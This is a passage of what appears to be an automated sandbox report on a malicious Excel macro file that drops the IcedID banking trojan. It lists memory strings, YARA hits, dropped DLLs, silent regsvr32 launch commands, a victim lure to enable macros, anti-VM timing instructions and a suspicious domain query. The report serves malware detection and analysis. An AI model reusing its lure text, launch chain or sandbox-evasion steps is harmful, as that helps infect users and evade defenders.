            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093300984.0000000000276000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/lr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

            E-Banking Fraud:

            barindex
            Yara detected IcedIDShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            System Summary:

            barindex
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
            Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
            Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
            Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
            Office process drops PE fileShow sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D1678 NtQuerySystemInformation,RtlAllocateHeap,4_2_004D1678
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D18104_2_004D1810
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB15D04_2_000007FEF8FB15D0
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB41BF4_2_000007FEF8FB41BF
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
            Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
            Source: 4.2.regsvr32.exe.4d0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
            Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
            Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
            Source: 00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outfordelivery389402.xlsmJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD3C2.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Outfordelivery389402.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
            Source: Outfordelivery389402.xlsmInitial sample: OLE zip file path = xl/media/image1.png
            Source: Outfordelivery389402.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
            Source: Outfordelivery389402.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D1E50 4_2_004D1E50
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000004D1E71 second address: 00000000004D1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
            Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000004D1EAB second address: 00000000004D1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D2434 rdtsc 4_2_004D2434
            Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_004D27BC
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
            Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D2434 rdtsc 4_2_004D2434

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
            Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.213.115 80Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_004D22DC LookupAccountNameW,4_2_004D22DC

            Stealing of Sensitive Information:

            barindex
            Yara detected IcedIDShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected IcedIDShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
